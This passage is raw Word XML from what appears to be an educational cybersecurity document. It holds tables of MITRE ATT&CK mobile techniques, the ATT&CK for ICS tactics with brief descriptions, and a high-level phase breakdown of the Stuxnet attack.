            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Educates users and developers about mobile threats and attacker strategies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="314992EC" w:rsidP="3E79F1B8" w:rsidRDefault="314992EC" w14:paraId="1C8EF951" w14:textId="2A569F7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="314992EC">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example Techniques per Tactic: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26"/>
        <w:gridCol w:w="3679"/>
        <w:gridCol w:w="927"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="2BC1AB26">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="20B9585B" w14:textId="6DB6DF93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Tactic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0D86C395" w14:textId="4F2457E7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Technique Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="77B950D1" w14:textId="320D154D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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="67F7F770">
        <w:trPr>
          <w:trHeight w:val="495"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4E618392" w14:textId="3860B7D8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Initial Access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38719B3C" w14:textId="644E57C3">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Drive-by Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="0626CFBA" w14:textId="7540FAFB">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>T1456</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5887B129">
        <w:trPr>
          <w:trHeight w:val="570"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="72E8D6F8" w14:textId="78D126C1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Execution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4F9C1363" w14:textId="2E00F85E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Exploitation for Client Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="7515B916" w14:textId="262CC998">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>T1406</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="289DB330">
        <w:trPr>
          <w:trHeight w:val="690"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="422AF8EC" w14:textId="54416B83">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Credential Access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32B0CD15" w14:textId="4F14222B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Input Capture via Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="213BE8A5" w14:textId="21E187B2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>T1417</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="20FEADA2">
        <w:trPr>
          <w:trHeight w:val="510"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6D018B73" w14:textId="015DE3E3">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Persistence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42BFE240" w14:textId="63332E56">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Modify System Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="351FC1B5" w14:textId="39AB281C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>T1409</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="41F23F93">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="681730D0" w14:textId="08EB69B8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3679" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="25CAC5F4" w14:textId="7415B9FC">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Exfiltration Over Cellular Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927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E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="78856C86" w14:textId="4CB71A1E"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="34A76350" w14:textId="7B867AF2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="58C283AE" w14:textId="0DF0C7E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="25746B03" w:rsidP="3E79F1B8" w:rsidRDefault="25746B03" w14:paraId="728AB0E4" w14:textId="49813DC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="25746B03">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. ISC Tactics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C919C3C" w:rsidRDefault="5C919C3C" w14:paraId="0212D33C" w14:textId="4D3864AF">
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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ICS Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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the </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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intent or purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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attacker behaviors during various stages of a cyberattack on industrial control systems.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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are the </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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layer</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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MITRE ATT&amp;CK for ICS Matrix, organizing </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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techniques and sub-techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5C919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by threat actors to compromise and manipulate industrial operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4DB75C97" w14:textId="6EC02E7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DFDFDF" w:sz="6"/>
          <w:left w:val="single" w:color="DFDFDF" w:sz="6"/>
          <w:bottom w:val="single" w:color="DFDFDF" w:sz="6"/>
          <w:right w:val="single" w:color="DFDFDF" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="694"/>
        <w:gridCol w:w="1523"/>
        <w:gridCol w:w="7142"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="3806D03E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3CC25F76" w14:textId="683A1669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ID</w:t>
            </w:r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164E89C4" w14:textId="1010F8E3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EE2E6" w:sz="12"/>
              <w:right w:val="single" w:color="DFDFDF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="5697017B" w14:textId="0A2A4059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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5AA5CD9F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5ED79A6" w14:textId="66924040">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R2744ed737f194d96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TA0108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07E70A1" w14:textId="5ECFAEDA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Ra53a32bfeae74ce2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Initial Access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319FACA" w14:textId="0CB1267B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get into your ICS environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="56958268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6516FF2" w14:textId="26B23A9A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R39682b2aee4948de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TA0104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B116457" w14:textId="6AC8D1A9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R856d14e2f0d6470d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Execution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3C0F4D8" w14:textId="7D3BE90D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run code or manipulate system functions, parameters, and data in an unauthorized way.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="1CB1B821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DB22E59" w14:textId="433863C9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R5fea61e8106943e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TA0110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E8CF245" w14:textId="494A7094">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rc9504356f3b241b8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Persistence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76979E1" w14:textId="4E2407E7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maintain their foothold in your ICS environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="454B201F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5817CB1" w14:textId="0E8B14F4">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R931c53766601448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TA0111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8370AA6" w14:textId="5C8E6845">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R64127df75203449d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Privilege Escalation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129F3CF" w14:textId="1EB6C02F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gain higher-level permissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="07DC6ABD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5CDF65E" w14:textId="0C2229BF">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rb2662ef1123843c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TA0103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7571813" w14:textId="66D09A74">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R1178c2393c194f4f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Evasion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89AE8E8" w14:textId="46C4C045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avoid security defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="119B7DA6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97879A3" w14:textId="3CEAE0B1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R419e1410dd3e468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TA0102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A7C5E70" w14:textId="3FFE9436">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R032dda74cdf64358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Discovery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BA296A1" w14:textId="26FBE37F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locating information to assess and identify their targets in your environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="75FAD4C7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E60E490" w14:textId="6F5DFED8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rf287360a7e7845a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TA0109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61BAF99" w14:textId="2D9C39C9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R94d1329434114cc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Lateral Movement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35A48F6" w14:textId="5AEADB38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move through your ICS environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="4E6C4C54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C1E0525" w14:textId="167236D8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R0602ad3402e6427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TA0100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016FE01" w14:textId="71EF9D9B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Re90651321b2940a1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Collection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6695548" w14:textId="5718EE43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gather data of interest and domain knowledge on your ICS environment to inform their goal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5D3C21CD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0D7F639" w14:textId="1CFF37E7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R0033e0ce0dd341e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TA0101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0C59995" w14:textId="310ED872">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R446ef86dec4a4f60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Command and Control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F23A073" w14:textId="0FD67E0B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communicate with and control compromised systems, controllers, and platforms with access to your ICS environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="15F0BA0E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7981882" w14:textId="5AE00169">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R94425eeed5324ec3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TA0107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50DAE500" w14:textId="4C19A86D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Ref79851e2de44ac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Inhibit Response Function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77AA14DD" w14:textId="4A998E5A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prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="09AD3A83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36F5F4E8" w14:textId="2912F011">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rbe3e4512c3564247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TA0106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43A255FA" w14:textId="79BBF501">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rbfc00219e118429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Impair Process Control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087213CA" w14:textId="720FE02F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manipulate, disable, or damage physical control processes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="0570FA33">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="694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6AFB11C9" w14:textId="0A607D47">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R8d8d62f528c9417a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TA0105</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1523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1CFB00A1" w14:textId="48B8E31A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R78326877797e4635">
              <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B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F7CAC"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>Impact</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DFDFDF" w:sz="6"/>
              <w:left w:val="single" w:color="DFDFDF" w:sz="6"/>
              <w:bottom w:val="single" w:color="DFDFDF" w:sz="6"/>
              <w:right w:val="single" w:color="DFDFDF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="2334AF79" w14:textId="55BE1321">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="39434C"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="371BAA50" w:rsidP="3E79F1B8" w:rsidRDefault="371BAA50" w14:paraId="5D78BAE1" w14:textId="283D4F0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="371BAA50">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Real-World Example: Stuxnet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8"/>
        <w:gridCol w:w="6165"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="2962C988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7ADADC77" w14:textId="5C1964EE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Phase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1E5F8FDC" w14:textId="0A2D1C01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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="2EABBD60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4C5082B0" w14:textId="16BA4561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Initial Access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4DDC10F6" w14:textId="23A95B3E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Infected USB drives introduced into nuclear facility systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="601FFACF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21D8203B" w14:textId="6DFE6674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Execution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35B6EAE1" w14:textId="200ED593">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Malware executed and searched for specific Siemens PLCs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="02E45D99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5E755B1E" w14:textId="3C351AD9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Privilege Escalation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0FCD2CD9" w14:textId="2E5BE6BE">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Exploited zero-day vulnerabilities to gain higher access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="3F6A47BB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4386B41E" w14:textId="6CD78243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Discovery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201B7246" w14:textId="13F0FB11">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Mapped out centrifuge control systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="35313A12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3E1AFA73" w14:textId="5EBB0592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Inhibit Response Function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1527C496" w14:textId="75D6DD63">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Disabled alarms so operators wouldn’t detect problems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="0E1C1209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4279A0DC" w14:textId="301B8B08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Impair Process Control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7670B288" w14:textId="44C5B662">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Sent false commands to speed up or slow down centrifuges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="7C7D008E">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="121E0C86" w14:textId="780EBFAC">
